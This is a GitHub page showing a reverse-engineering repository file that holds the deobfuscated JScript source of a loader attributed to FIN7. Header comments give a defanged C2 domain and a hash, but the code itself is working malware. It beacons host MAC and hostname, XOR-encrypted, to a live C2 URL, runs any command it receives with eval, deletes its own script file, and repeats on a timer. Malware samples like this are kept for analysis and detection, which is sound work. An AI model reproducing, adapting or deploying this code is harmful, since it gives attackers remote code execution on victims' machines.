Skip to content
Permalink
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

Malware-Misc-RE/2019-05-13-FIN7-JS-loader.vk.js /
Jump to
Code definitions
Code navigation index up-to-date

Go to file
  • Go to file
  • Copy path
  • Copy permalink
 
 
Cannot retrieve contributors at this time
159 lines (153 sloc) 6.16 KB
Raw Blame
Open in GitHub Desktop
// Bank Statement James Fifeman.xls
// C2: hxxps://msdn-update[.]com/
// SHA-256: 1fe27e0a84a5bd2e433360fd2da5b1cad8d142ca2acbf3e256f0c99d99cb57f1
function anonymous() {
var zbegbiwhuhro = "&id=";
var ihebgysipc = "fetch";
var yfusrihyny = "";
var tindajrurke = "get_image";
var ytysqyprozlibx = "string";
var otocywviso = "no";
var otbybimollu = "Unknown";
var evaritpequx = "Scripting.FileSystemObject";
var yqpawymfikorh = "_";
var koficijojhi = "/";
var inoxhegzajw = "action=get_command";
var ihunuxfip = "request";
var edomsecejso = "z";
var lwilpotasvo = "create_logo";
var vimkiwono = "string";
var pidwagunit = "%APPDATA%";
var gqyxqohoftupi = "winmgmts:root/CIMV2";
var erzirolonje = "create_image";
var esajigfown = "decrypt";
var ewypetevhu = "?request=page";
var bgixmabefzaqnu = "show_ico";
var huzzakrowopvu = "";
var zexygrogy = "";
var iwpodhexzubc = "images";
var bbymyruztovpi = "WScript.Shell";
var xaprislyhbulf = "show_jpg";
var inbypzethezag = "&";
var ucmomadgib = "request";
var vjiwumhojarse = "group=zsoc._1305&rt=0&secret=fghedf43dsSFvm03&time=120000&uid=";
var cedlihrijalti = "?request=content&id=";
var kyppaltuwti = "image";
var ejogamygpu = "MSXML2.ServerXMLHTTP";
var cylofalpitx = "content";
var fifuwacdez = "encrypt";
var atkudecaxme = "decrypt";
var obawufdoxsa = "";
var bhomnismictu = "encrypt";
var ocsekeltan = "show_png";
var vivijsozvali = "User-Agent";
var yracypcamos = "no";
var kexerobi = "cdn";
var inamvagtixjyxj = "POST";
var usubhejreva = "_";
var jaxylibpafl = "";
var hbanamyklujt = "";
var bvaxoqwetmodg = "agyjabam=";
var ditevnaqa = "https://msdn-update.com/";
var wegmexxabha = "POST";
var dnanehmufride = "encrypt";
var fypalygos = "application/x-www-form-urlencoded";
var urmuqizemz = "Content-Type";
function id() {
var lrequest = wmi.ExecQuery("select * from Win32_NetworkAdapterConfiguration where ipenabled = true");
var lItems = new Enumerator(lrequest);
for (; !lItems.atEnd(); lItems.moveNext()) {
var mac = lItems.item().macaddress;
var dns_hostname = lItems.item().DNSHostName;
if (typeof mac === vimkiwono && mac.length > 1) {
if (typeof dns_hostname !== vimkiwono && dns_hostname.length < 1) {
dns_hostname = otbybimollu;
} else {
for (var i = 0; i < dns_hostname.length; i++) {
if (dns_hostname.charAt(i) > edomsecejso) {
dns_hostname = dns_hostname.substr(0, i) + yqpawymfikorh + dns_hostname.substr(i + 1);
}
}
}
return mac + yqpawymfikorh + dns_hostname;
}
}
}
function crypt_controller(type, request) {
var encryption_key = obawufdoxsa;
if (type === esajigfown) {
request = unescape(request);
var request_split = request.split(")*(");
request = request_split[0];
encryption_key = request_split[1].split(obawufdoxsa);
} else {
encryption_key = (Math.floor(Math.random() * 9000) + 1000).toString().split(obawufdoxsa);
request = unescape(encodeURIComponent(request));
}
var output = new Array(request.length);
for (var i = 0; i < request.length; i++) {
var charCode = request.charCodeAt(i) ^ encryption_key[i % encryption_key.length].charCodeAt(0);
output[i] = String.fromCharCode(charCode);
}
var result_string = output.join(obawufdoxsa);
if (type === fifuwacdez) {
result_string = result_string + ")*(" + encryption_key.join(obawufdoxsa);
result_string = escape(result_string);
}
return result_string;
}
function get_path() {
var pathes = [iwpodhexzubc, kyppaltuwti, cylofalpitx, ihebgysipc, kexerobi];
var files = [lwilpotasvo, tindajrurke, erzirolonje, bgixmabefzaqnu, ocsekeltan, xaprislyhbulf];
var path = pathes[Math.floor(Math.random() * pathes.length)] + koficijojhi + files[Math.floor(Math.random() * files.length)];
return ditevnaqa + path;
}
function send_data(type, data, crypt) {
try {
var http_object = new ActiveXObject(ejogamygpu);
if (type === ucmomadgib) {
http_object.open(inamvagtixjyxj, get_path() + ewypetevhu, false);
data = bvaxoqwetmodg + crypt_controller(fifuwacdez, vjiwumhojarse + uniq_id + zbegbiwhuhro + id() + inbypzethezag + data);
} else {
http_object.open(inamvagtixjyxj, get_path() + cedlihrijalti + uniq_id, false);
if (crypt) {
data = crypt_controller(fifuwacdez, data);
}
}
http_object.setRequestHeader(vivijsozvali, "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/50.0");
http_object.setRequestHeader(urmuqizemz, fypalygos);
http_object.setOption(2, 13056);
http_object.send(data);
return http_object.responseText;
} catch (e) {
return otocywviso;
}
}
function main() {
var ncommand = obawufdoxsa;
ncommand = send_data(ucmomadgib, inoxhegzajw, true);
if (ncommand !== otocywviso) {
try {
eval(crypt_controller(esajigfown, ncommand));
} catch (e) {}
}
var random_knock = 120000 + (Math.floor(Math.random() * 16001) - 5000);
WScript.Sleep(random_knock);
main();
}
var first = false;
var shell = new ActiveXObject(bbymyruztovpi);
var fso = new ActiveXObject(evaritpequx);
var wmi = GetObject(gqyxqohoftupi);
var uniq_id = new Date().getUTCMilliseconds();
var app_path = shell.expandEnvironmentStrings(pidwagunit);
if (fso.GetFolder(app_path).Type.length > 5) {
fso.deleteFile(WScript.ScriptFullName);
try {
WScript.Sleep(120000);
main();
} catch (e) {
main();
}
}
}